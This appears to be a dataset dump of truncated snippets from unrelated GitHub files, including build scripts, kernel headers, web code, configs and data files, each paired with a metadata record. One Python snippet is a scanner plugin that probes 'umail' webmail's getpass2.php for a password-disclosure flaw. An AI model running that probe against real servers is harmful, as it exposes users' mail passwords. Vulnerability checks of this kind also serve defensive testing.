text
stringlengths
2
99.9k
meta
dict
### Makefile -- Newton's method # Author: Michael Grünewald # Date: Thu Oct 3 23:39:20 CEST 2013 # BSD Owl Scripts (https://github.com/michipili/bsdowl) # This file is part of BSD Owl Scripts # # Copyright © 2002–2017 Michael Grünewald. All Rights Reserved. # # This file must be used under the terms of the BSD licen...
{ "pile_set_name": "Github" }
# Copyright (c) 2012-2019 by the GalSim developers team on GitHub # https://github.com/GalSim-developers # # This file is part of GalSim: The modular galaxy image simulation toolkit. # https://github.com/GalSim-developers/GalSim # # GalSim is free software: redistribution and use in source and binary forms, # with or w...
{ "pile_set_name": "Github" }
/* DVB Driver for Philips tda827x / tda827xa Silicon tuners (c) 2005 Hartmut Hackmann (c) 2007 Michael Krufky This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either v...
{ "pile_set_name": "Github" }
<!doctype html> <meta charset="utf-8" /> <style> html, body { font-family: monospace; } </style> <?php /** * Example 1. * Usage VK API without authorization. * Some calls are not available. * @link http://vk.com/developers.php VK API */ error_reporting(E_ALL); require_once('../src/VK/VK.php'...
{ "pile_set_name": "Github" }
#pragma once // Params should go here.... // code goes here // example ABI_SYSV int test(int input); void WKBundleInitialize();
{ "pile_set_name": "Github" }
/* This project is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Deviation is distributed in the hope that it will be useful, but WITHO...
{ "pile_set_name": "Github" }
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef _LINUX_BUG_H #define _LINUX_BUG_H #include <asm/bug.h> #include <linux/compiler.h> #include <linux/build_bug.h> enum bug_trap_type { BUG_TRAP_TYPE_NONE = 0, BUG_TRAP_TYPE_WARN = 1, BUG_TRAP_TYPE_BUG = 2, }; struct pt_regs; #ifdef __CHECKER__ #define MAYBE_BUILD_BUG_...
{ "pile_set_name": "Github" }
/* * Copyright (c) 2012 The WebRTC project authors. All Rights Reserved. * * Use of this source code is governed by a BSD-style license * that can be found in the LICENSE file in the root of the source * tree. An additional intellectual property rights grant can be found * in the file PATENTS. All contribut...
{ "pile_set_name": "Github" }
<template lang="pug"> .materials-create b-form(@submit.prevent="validateBeforeSubmit") .form-row .col-6 label(for="name") translate Name input.form-control#name(type="text" v-validate="'required'" :class="{'input': true, 'text-danger': errors.has('name') }" v-model="i...
{ "pile_set_name": "Github" }
// (C) Copyright John Maddock 2006. // Use, modification and distribution are subject to the // Boost Software License, Version 1.0. (See accompanying file // LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) // // This is not a complete header file, it is included by gamma.hpp // after it has defin...
{ "pile_set_name": "Github" }
package utils; /** * Created with IntelliJ IDEA. * User: Diego * Date: 17/11/13 * Time: 13:48 * This is a Java port from Tom Schaul's VGDL - https://github.com/schaul/py-vgdl */ public class CompetitionParameters { /** * Indicates if the OS is Windows. */ public static final boolean OS_WIN = Sy...
{ "pile_set_name": "Github" }
--- a/net/minecraft/util/datafix/fixes/EntityRename.java +++ b/net/minecraft/util/datafix/fixes/EntityRename.java @@ -19,8 +19,8 @@ } public TypeRewriteRule makeRule() { - TaggedChoiceType<String> taggedchoicetype = this.getInputSchema().findChoiceType(TypeReferences.field_211299_o); - TaggedChoiceT...
{ "pile_set_name": "Github" }
/* User login and signup forms */ .mw-ui-vform .mw-form-related-link-container { margin-bottom: 0.5em; text-align: center; } .mw-ui-vform .mw-secure { background: url( images/icon-lock.png ) no-repeat left center; margin: 0 0 0 1px; padding: 0 0 0 11px; } /* * When inside the VForm style, disable the border tha...
{ "pile_set_name": "Github" }
"use strict"; var isImplemented = require("../../../../reg-exp/#/match/is-implemented"); module.exports = function (a) { a(isImplemented(), true); };
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <menu xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto"> <item android:id="@+id/search_ab_search" android:icon="@drawable/ic_search_light" android:title="@string/find_your_device_title" ...
{ "pile_set_name": "Github" }
# Copyright 2015-2016 Yelp Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writin...
{ "pile_set_name": "Github" }
#!/usr/bin/env python import cgitb; cgitb.enable() print('Content-type: text/html\n') print(1/0) print('Hello, world!')
{ "pile_set_name": "Github" }
% Generated by roxygen2: do not edit by hand % Please edit documentation in R/release.R \name{release_gh} \alias{release_gh} \title{Create a new release on GitHub} \usage{ release_gh(bump = "dev", is_cran = bump != "dev") } \arguments{ \item{bump}{The bump increment, either "dev", "patch", "minor" or "major".} \item{i...
{ "pile_set_name": "Github" }
using System; namespace Org.BouncyCastle.Asn1.Esf { /// <remarks> /// <code> /// SigPolicyQualifierInfo ::= SEQUENCE { /// sigPolicyQualifierId SigPolicyQualifierId, /// sigQualifier ANY DEFINED BY sigPolicyQualifierId /// } /// /// SigPolicyQualifierId ::= OBJECT IDENTIFIER /// </code> /// <...
{ "pile_set_name": "Github" }
using System; using System.IO; namespace FluentNHibernate.Diagnostics { public class ConsoleOutputListener : IDiagnosticListener { readonly IDiagnosticResultsFormatter formatter; public ConsoleOutputListener() : this(new DefaultOutputFormatter()) {} p...
{ "pile_set_name": "Github" }
source "https://rubygems.org" gem 'uglifier' gem 'rake'
{ "pile_set_name": "Github" }
// RUN: %clang_cc1 -x objective-c++ -triple x86_64-apple-darwin10 -emit-llvm -fcxx-exceptions -fexceptions -fobjc-exceptions -o - %s | FileCheck %s extern "C" { int __objc_personality_v0(); } void *abuse_personality_func() { return (void *)&__objc_personality_v0; } void foo() { try { throw 0; } catch (in...
{ "pile_set_name": "Github" }
using UnityEngine; using System.Collections; using System.Collections.Generic; using System; public class OvrAvatarBody : MonoBehaviour { public virtual void UpdatePose(float voiceAmplitude) { } }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <grit latest_public_release="0" current_release="1"> <outputs> <output filename="grit/quota_internals_resources.h" type="rc_header"> <emit emit_type='prepend'></emit> </output> <output filename="quota_internals_resources.pak" type="data_package" /> </outputs>...
{ "pile_set_name": "Github" }
/* iCheck plugin Polaris skin ----------------------------------- */ .icheckbox_polaris, .iradio_polaris { display: inline-block; *display: inline; vertical-align: middle; margin: 0; padding: 0; width: 29px; height: 29px; background: url(polaris.png) no-repeat; border: none; curs...
{ "pile_set_name": "Github" }
#include "STDInclude.hpp" STEAM_IGNORE_WARNINGS_START namespace Steam { void GameServer::LogOn() { } void GameServer::LogOff() { } bool GameServer::LoggedOn() { return true; } bool GameServer::Secure() { return false; } SteamID GameServer::GetSteamID() { return SteamI...
{ "pile_set_name": "Github" }
// This file can be replaced during build by using the `fileReplacements` array. // `ng build --prod` replaces `environment.ts` with `environment.prod.ts`. // The list of file replacements can be found in `angular.json`. export const environment = { production: false }; /* * For easier debugging in development mod...
{ "pile_set_name": "Github" }
set(CMAKE_CXX_FLAGS "-std=c++0x ${CMAKE_CXX_FLAGS}") set (SRCS http_parser.c httpclient.cpp httpconnection.cpp httpconnector.cpp httpparser.cpp httprequest.cpp httpresponse.cpp httpserver.cpp httputil.cpp wsclient.cpp wsconnection.cpp wsutil.cpp ) add_definitions(-D...
{ "pile_set_name": "Github" }
from mido.messages.specs import SPEC_BY_STATUS from mido.messages.encode import encode_message from mido.messages.decode import decode_message def test_encode_decode_all(): """Encode and then decode all messages on all channels. Each data byte is different so that the test will fail if the bytes are swap...
{ "pile_set_name": "Github" }
--- name: 🚀 Feature Request about: A suggestion for a new feature ✨ --- ### Feature Request #### Motivation Behind Feature <!-- Why should this feature be implemented? What problem does it solve? --> #### Feature Description <!-- Describe your feature request in detail --> <!-- Please provide any code examples or ...
{ "pile_set_name": "Github" }
<!-- Generated by pkgdown: do not edit by hand --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Prepare for unpack or bind values into the calling environment. — [.U...
{ "pile_set_name": "Github" }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Uses of Class org.apache.sysds.lops.DnnTransform (SystemDS 2.0.0-SNAPSH...
{ "pile_set_name": "Github" }
/* * dumptrees - utility for libfdt testing * * (C) Copyright David Gibson <dwg@au1.ibm.com>, IBM Corporation. 2006. * * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License as * published by the Free Software Foundation; either version 2...
{ "pile_set_name": "Github" }
## Lab: Integrating Web Push In this lab you learn how to use the Notification API and Push API. It uses the web-push library to push a message with data to the service workers from a Node.js server. ## Getting started To get started, check out the instructions on [developers.google.com](https://developers.google.co...
{ "pile_set_name": "Github" }
// *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** // *** Do not edit by hand unless you're certain you know what you are doing! *** using System; using System.Collections.Generic; using System.Collections.Immutable; using System.Threading.Tasks; using Pulumi.Serialization; names...
{ "pile_set_name": "Github" }
<?php $ent = __FILE__; echo $ent . ' (SHA1: ' . sha1_file($ent) . ')';
{ "pile_set_name": "Github" }
#!/usr/bin/env bash if [ "$PERSIST_MODE" = "@cassandra" ] then cat <<EOF > ${HANLON_WEB_PATH}/config/cassandra_db.conf hosts: $CASSANDRA_PORT_9042_TCP_ADDR port: 9042 keyspace: 'project_hanlon' repl_strategy: $REPL_STRATEGY repl_factor: $REPL_FACTOR EOF ./hanlon_init -j '{"persist_mode": "'$PERSIST_MODE'", "persis...
{ "pile_set_name": "Github" }
#### # # OBJ File Generated by Meshlab # #### # Object head_camera.obj # # Vertices: 480 # Faces: 256 # #### vn 0.000000 -0.315211 0.949022 v -0.041643 0.028613 0.097818 vn 0.000000 -0.315211 0.949022 v 0.017057 -0.027387 0.079218 vn 0.000000 -0.315211 0.949022 v 0.017057 0.028613 0.097818 vn 0.000000 -0.315211 0.94902...
{ "pile_set_name": "Github" }
/** * Copyright (c) 2017-present, Viro Media, Inc. * All rights reserved. * * This source code is licensed under the BSD-style license found in the * LICENSE file in the root directory of this source tree. An additional grant * of patent rights can be found in the PATENTS file in the same directory. */ import Re...
{ "pile_set_name": "Github" }
#include <Source/HwLayer/Types.h> #include <Source/HwLayer/Bios.h> extern "C" void __cxa_pure_virtual() { _ASSERT(!!!"Pure virtual call"); while(1);} extern "C" { #include "BIOS.h" } #include "../bios/core.h" #include "../bios/font.h" #include "../bios/lcd.h" #include "../bios/key.h" #include "../bios/adc.h" #includ...
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html> <!-- FuelUX attribute --> <head> <meta charset="utf-8"> <title>RasPiBrew</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Bootstrap --> <link type="text/css" href="static/external/bootstrap-3.0.3/css/bootstrap.min.css" rel="stylesheet"> <link type=...
{ "pile_set_name": "Github" }
-0.622799993 1.00000002E-24 -0.610800028 1.00000002E-24 -0.598800004 1.00000002E-24 -0.586799979 1.00000002E-24 -0.574800014 1.00000002E-24 -0.562799990 1.00000002E-24 -0.550800025 1.00000002E-24 -0.538800001 1.00000002E-24 -0.526799977 1....
{ "pile_set_name": "Github" }
:10FC000001C0DDC0112484B790E890936100109288 :10FC10006100882361F0982F9A70923041F081FF43 :10FC200002C097EF94BF282E80E0ECD0E9C185E0B8 :10FC30008093810082E08093C00088E18093C100BE :10FC40008FE88093C40086E08093C2008EE0DAD013 :10FC5000259A84E02AEB3AEF91E0309385002093D7 :10FC6000840096BBB09BFECF1D9AA8954091C00022 :10FC...
{ "pile_set_name": "Github" }
unit DW.iOSapi.CoreNFC; {*******************************************************} { } { Kastri Free } { } { DelphiWorlds Cross-Platform Library }...
{ "pile_set_name": "Github" }
//////////////////////////////////////////////////////////// // // DAGON - An Adventure Game Engine // Copyright (c) 2011-2014 Senscape s.r.l. // All rights reserved. // // This Source Code Form is subject to the terms of the // Mozilla Public License, v. 2.0. If a copy of the MPL was // not distributed with this file,...
{ "pile_set_name": "Github" }
from Crypto.Cipher import AES from Crypto.Util import Counter import struct from scapy.layers.dot15d4 import * from scapy.layers.zigbee import * import struct conf.dot15d4_protocol = 'zigbee' DEFAULT_TRANSPORT_KEY = b'ZigBeeAlliance09' BLOCK_SIZE = 16 MIC_SIZE = 4 def block_xor(block1, block2): r...
{ "pile_set_name": "Github" }
# -*- encoding: utf-8 -*- Gem::Specification.new do |s| s.name = "plymouth" s.version = "0.3.3" s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["John Mair (banisterfiend)"] s.date = "2012-10-04" s.description = "Start an interactive sess...
{ "pile_set_name": "Github" }
at.clause.order=At-clauses have to appear in the order ''{0}''. invalid.position=Javadoc comment is placed in the wrong location. javadoc.blockTagLocation=The Javadoc block tag ''@{0}'' should be placed at the beginning of the line. javadoc.classInfo=Unable to get class information for {0} tag ''{1}''. javadoc.content....
{ "pile_set_name": "Github" }
thingness / (1) (foo: 11) Dimension coordinates: foo x Attributes: source: ꀀabcd޴
{ "pile_set_name": "Github" }
<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>jQuery UI Spinner - Time</title> <link rel="stylesheet" href="../../themes/base/jquery.ui.all.css"> <script src="../../jquery-1.10.2.js"></script> <script src="../../external/jquery.mousewheel.js"></script> <script src="../../external/globalize...
{ "pile_set_name": "Github" }
/* * Copyright (c) 2005-2010, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * * WSO2 Inc. licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file except * in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.o...
{ "pile_set_name": "Github" }
var convert = require('./convert'), func = convert('sortedIndexBy', require('../sortedIndexBy')); func.placeholder = require('./placeholder'); module.exports = func;
{ "pile_set_name": "Github" }
// // Generated by class-dump 3.5 (64 bit). // // class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard. // #import "NSLayoutConstraint.h" @interface NSLayoutConstraint (SAFE) + (id)safeConstraintsWithVisualFormat:(id)arg1 options:(unsigned long long)arg2 metrics:(id)arg3 views:(id)arg4;...
{ "pile_set_name": "Github" }
syntax = "proto2"; package Qot_GetRT; option java_package = "com.futu.openapi.pb"; option go_package = "github.com/futuopen/ftapi4go/pb/qotgetrt"; import "Common.proto"; import "Qot_Common.proto"; message C2S { required Qot_Common.Security security = 1; //股票 } message S2C { required Qot_Common.Security security = ...
{ "pile_set_name": "Github" }
/*global window, XMLHttpRequest, blackberry, utils */ /* * Copyright 2014 BlackBerry Limited. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 *...
{ "pile_set_name": "Github" }
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <!-- AmCharts includes --> <script src="http://www....
{ "pile_set_name": "Github" }
<?php require_once("include/html_functions.php"); if (isset($_GET['date'])) { $date = $_GET['date']; } else { $date = time(); } $cur_text = date("l jS \of F Y", $date); $day = date("D", $date); $is_party = ($day == "Fri" || $day == "Sat"); // add a day $next_time = $date + (24 * 60 * 60); ?> <?php our_header("...
{ "pile_set_name": "Github" }
// The constructor function function SingletonSet(member) { this.member = member; // Remember the single member of the set } // Create a prototype object that inherits from the prototype of Set. SingletonSet.prototype = inherit(Set.prototype); // Now add properties to the prototype. // These properties overrid...
{ "pile_set_name": "Github" }
apiVersion: v1 items: - apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: labels: test-cmd: auth name: testing-CR rules: - apiGroups: - "" resources: - pods verbs: - create - delete - deletecollection - get - list - patch - update ...
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>CFBundleDevelopmentRegion</key> <string>$(DEVELOPMENT_LANGUAGE)</string> <key>CFBundleExecutable</key> <string>$(EXECUTABLE_NAME)</string> ...
{ "pile_set_name": "Github" }
/* The subtitle format describing eventual glucose. (1: localized glucose value description) */ "Eventually %1$@" = "Eventualmente %1$@"; /* The subtitle format describing units of active insulin. (1: localized insulin value description) */ "IOB %1$@ U" = "IOB %1$@ U";
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html lang="fr"> <head> <meta charset="UTF-8"> <title>{% apply striptags %}{% block title '' %}{% endapply %} | Grafikart</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimal-ui" /> {% block stylesheets %} {{ encore_entry_link_tags('app') }...
{ "pile_set_name": "Github" }
# MongoDB - Aula 06 - Exercício === Autor: Gabriel Tomé ###1 - Fazer uma query para o campo name utilizando explain para ver o resultado da busca ``` MacBook-Pro-de-Gabriel-Tome(mongod-3.0.7) pokemons> var query = {name:"Pikachu"} MacBook-Pro-de-Gabriel-Tome(mongod-3.0.7) pokemons> db.pokemons.find(query).explain() ...
{ "pile_set_name": "Github" }
[ [ "" ], [ "x" ], [ "37qgekLpCCHrQuSjvX3fs496FWTGsHFHizjJAs6NPcR47aefnnCWECAhHV6E3g4YN7u7Yuwod5Y" ], [ "dzb7VV1Ui55BARxv7ATxAtCUeJsANKovDGWFVgpTbhq9gvPqP3yv" ], [ "MuNu7ZAEDFiHthiunm7dPjwKqrVNCM3mAz6rP9zFveQu14YA8CxExSJTHcVP9DErn6u84E6Ej7S" ], [ "rPpQpYknyNQ5AEHuY6H8ijJJrY...
{ "pile_set_name": "Github" }
// // Copyright (c) Microsoft Corporation. // Licensed under the MIT License. // using System.Collections; using System.Collections.Generic; using UnityEngine; using Microsoft.MixedReality.Toolkit.UI; namespace Microsoft.MixedReality.Toolkit.Examples.Demos { [AddComponentMenu("Scripts/MRTK/Examples/SliderLunarLan...
{ "pile_set_name": "Github" }
// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CONTENT_BROWSER_RENDERER_HOST_PEPPER_PEPPER_UDP_SOCKET_MESSAGE_FILTER_H_ #define CONTENT_BROWSER_RENDERER_HOST_PEPPER_PEPPER_UDP_SOCKET_MESSAGE_FI...
{ "pile_set_name": "Github" }
#include "SYS.h" SYS_call_2(statfs)
{ "pile_set_name": "Github" }
# Guides Below is a sorted list of guides created by members of the osu!community; most of which had originated from the osu!forums and have been ported over to the osu! wiki. ## Beatmapping *Main page: [Beatmapping](/wiki/Beatmapping)* - [Adding Custom Hitsounds](Adding_Custom_Hitsounds) - [Audio Editing](Audio_Ed...
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <package xmlns="http://schemas.microsoft.com/packaging/2011/08/nuspec.xsd"> <metadata> <id>Apworks.ObjectContainers.Unity</id> <version>2.5.4878.35266</version> <title>Apworks Unity Object Container</title> <authors>apworks.org</authors> ...
{ "pile_set_name": "Github" }
'use strict'; module.exports = function (cb) { var stdin = process.stdin; var ret = ''; if (stdin.isTTY) { setImmediate(cb, ''); return; } stdin.setEncoding('utf8'); stdin.on('readable', function () { var chunk; while (chunk = stdin.read()) { ret += chunk; } }); stdin.on('end', function () { ...
{ "pile_set_name": "Github" }
## SyncPage * Skype: RobinKuiper.eu * Discord: Atheos#1095 * Roll20: https://app.roll20.net/users/1226016/robin * Github: https://github.com/RobinKuiper/Roll20APIScripts * Reddit: https://www.reddit.com/user/robinkuiper/ * Patreon: https://patreon.com/robinkuiper * Paypal.me: https://www.paypal.me/robinkuiper --- ``...
{ "pile_set_name": "Github" }
/* * Copyright (C) 2017 - present Instructure, Inc. * * This file is part of Canvas. * * Canvas is free software: you can redistribute it and/or modify it under * the terms of the GNU Affero General Public License as published by the Free * Software Foundation, version 3 of the License. * * Canvas is distribut...
{ "pile_set_name": "Github" }
/* Lzma86Enc.c -- LZMA + x86 (BCJ) Filter Encoder 2009-08-14 : Igor Pavlov : Public domain */ #include <string.h> #include "Lzma86.h" #include "Alloc.h" #include "Bra.h" #include "LzmaEnc.h" #define SZE_OUT_OVERFLOW SZE_DATA_ERROR static void *SzAlloc(void *p, size_t size) { p = p; return MyAlloc(size); } static v...
{ "pile_set_name": "Github" }
/* Copyright 2015 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, ...
{ "pile_set_name": "Github" }
// This file is part of Eigen, a lightweight C++ template library // for linear algebra. // // Copyright (C) 2008-2010 Gael Guennebaud <gael.guennebaud@inria.fr> // // This Source Code Form is subject to the terms of the Mozilla // Public License v. 2.0. If a copy of the MPL was not distributed // with this file, You c...
{ "pile_set_name": "Github" }
/*! @file OIDScopes.m @brief AppAuth iOS SDK @copyright Copyright 2015 Google Inc. All Rights Reserved. @copydetails Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the L...
{ "pile_set_name": "Github" }
<!doctype html> <html lang="zh-CN" data-page="popup"> <head> <meta charset="UTF-8"> <title>Paodin</title> </head> <body> <div id="app"> </div> <!-- built files will be auto injected --> </body> </html>
{ "pile_set_name": "Github" }
<!--++ I5.1/premises001.rdf ** generated using webont test editor. ++--> <!--++ Created 7 May 2003 10:53:21 GMT ++--> <!-- Copyright World Wide Web Consortium, (Massachusetts Institute of Technology, European Research Consortium for Informatics and Mathematics, Keio University). All Rights Reserved. Please ...
{ "pile_set_name": "Github" }
/* * Copyright (c) 2018 The WebRTC project authors. All Rights Reserved. * * Use of this source code is governed by a BSD-style license * that can be found in the LICENSE file in the root of the source * tree. An additional intellectual property rights grant can be found * in the file PATENTS. All contribut...
{ "pile_set_name": "Github" }
- @all_comments.each_with_index do |comment, i| - first_style = (i==0 ? "guset-topbr" : "") .cont-list class=first_style - user = comment.user = link_to user.name, m(site(user)) | :#{p_comment_info comment.body} em.font-g | &nbsp;(#{comment.created_at.strftime(t'no_year')})
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"> <meta name="description" content="admin-themes-lab"> <meta name="author" content="themes-lab"> <link rel="shortcut icon" href="../assets/global/i...
{ "pile_set_name": "Github" }
import { IconDefinition, IconPrefix, IconName } from "@fortawesome/fontawesome-common-types"; export const definition: IconDefinition; export const faMicrophoneAltSlash: IconDefinition; export const prefix: IconPrefix; export const iconName: IconName; export const width: number; export const height: number; export cons...
{ "pile_set_name": "Github" }
SUBROUTINE CUPMTR( SIDE, UPLO, TRANS, M, N, AP, TAU, C, LDC, WORK, $ INFO ) * * -- LAPACK routine (version 3.0) -- * Univ. of Tennessee, Univ. of California Berkeley, NAG Ltd., * Courant Institute, Argonne National Lab, and Rice University * September 30, 1994 * * .. Scalar...
{ "pile_set_name": "Github" }
// Copyright (C) 2007 Ruben Smits <ruben dot smits at mech dot kuleuven dot be> // Version: 1.0 // Author: Ruben Smits <ruben dot smits at mech dot kuleuven dot be> // Maintainer: Ruben Smits <ruben dot smits at mech dot kuleuven dot be> // URL: http://www.orocos.org/kdl // This library is free software; you can r...
{ "pile_set_name": "Github" }
<!doctype html> <html ⚡> <head> <meta charset="utf-8"> <title>My AMP Page</title> <link rel="canonical" href="self.html" /> <meta name="viewport" content="width=device-width,minimum-scale=1"> <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s...
{ "pile_set_name": "Github" }
#!/usr/bin/env python def assign(service, arg): if service == "umail": return True, arg def audit(arg): payload = "webmail/getpass2.php?email=1@qq .com&update=2" url = arg + payload code, head, res, errcode, _ = curl.curl(url) if code == 200 and "Your password is" in res: security_...
{ "pile_set_name": "Github" }
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT. package s3 import ( "time" "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/request" ) // WaitUntilBucketExists uses the Amazon S3 API operation // HeadBucket to wait for a condition to be met before returning. // If the condition...
{ "pile_set_name": "Github" }
# frozen_string_literal: true lib = File.expand_path('lib', __dir__) $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) require 'circleci/bundle/update/pr/version' Gem::Specification.new do |spec| spec.name = 'circleci-bundle-update-pr' spec.version = Circleci::Bundle::Update::Pr::VERSION sp...
{ "pile_set_name": "Github" }
.define _execle .extern _execle .sect .text .sect .rom .sect .data .sect .bss .sect .text _execle: link a6,#0 tst.b -48(sp) lea 12(a6),a0 1: tst.l (a0)+ bne 1b move.l a0,-(sp) pea 12(a6) move.l 8(a6),-(sp) jsr _execve add.l #0xC,sp unlk a6 rts
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>VMware Horizon</title> <!-- This is build path. The origin path is /ui/src/main/webapp/webclient/styles/style.css --> <link rel="stylesheet" href="/portal/webclient/sty...
{ "pile_set_name": "Github" }
// SPDX-License-Identifier: GPL-2.0 #include <test_progs.h> #include "test_send_signal_kern.skel.h" static volatile int sigusr1_received = 0; static void sigusr1_handler(int signum) { sigusr1_received++; } static void test_send_signal_common(struct perf_event_attr *attr, bool signal_thread, const ch...
{ "pile_set_name": "Github" }
<?php /* * This file is part of SwiftMailer. * (c) 2004-2009 Chris Corbyn * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ /** * An ESMTP handler for AUTH support. * * @author Chris Corbyn */ class Swift_Transport_Esmtp_AuthHan...
{ "pile_set_name": "Github" }
<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" tools:context=".MainActivity" > <fragment android:id="@+id/map" android:name="com.google.android.gms.ma...
{ "pile_set_name": "Github" }
li { margin-bottom: 0.5em; } div.footnote { text-indent: -1.3em; margin-left: 1.3em; margin-bottom: 0.2em; } div.pagebreak { page-break-before: always; } .hangindent { text-indent: -2em; margin-left: 2em; } h2 { font-size: 110%; margin-top: 1em; margin-bottom: 0em; padding-top: 0em; padding...
{ "pile_set_name": "Github" }
class MockObject def initialize(name, options = {}) @name = name @null = options[:null_object] end def method_missing(sym, *args, &block) @null ? self : super end private :method_missing end class NumericMockObject < Numeric def initialize(name, options = {}) @name = name @null = optio...
{ "pile_set_name": "Github" }
//------------------------------------------------------------------------------ /* This file is part of rippled: https://github.com/ripple/rippled Copyright 2020 Ripple Labs Inc. Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, p...
{ "pile_set_name": "Github" }
using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace Tests.FakeDomain.Models { public class BlogPost { public int ID { get; set; } public string Title { get; set; } public string ShortTitle { get; set; } public DateTime Created { get; ...
{ "pile_set_name": "Github" }
{ "variants": { "": { "model": "quark:block/pink_stained_planks" } } }
{ "pile_set_name": "Github" }
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License")...
{ "pile_set_name": "Github" }
--- sidebar: home_sidebar title: Build for gts210wifi folder: build permalink: /devices/gts210wifi/build device: gts210wifi --- {% include templates/device_build.md %}
{ "pile_set_name": "Github" }